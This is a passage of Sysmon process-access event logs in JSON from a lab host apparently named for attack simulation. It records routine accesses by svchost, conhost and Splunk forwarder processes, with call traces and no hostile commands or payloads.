C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8158,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8159,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8160,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8161,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8162,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8163,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8164,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.747\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04FE-5F25-0000-001075A31200}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.747","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04FE-5F25-0000-001075A31200}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8165,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.887\r\nSourceProcessGUID: {A837DB8D-0515-5F25-0000-001088281300}\r\nSourceProcessId: 3788\r\nSourceThreadId: 5108\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.887","SourceProcessGUID":"{A837DB8D-0515-5F25-0000-001088281300}","SourceProcessId":"3788","SourceThreadId":"5108","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program 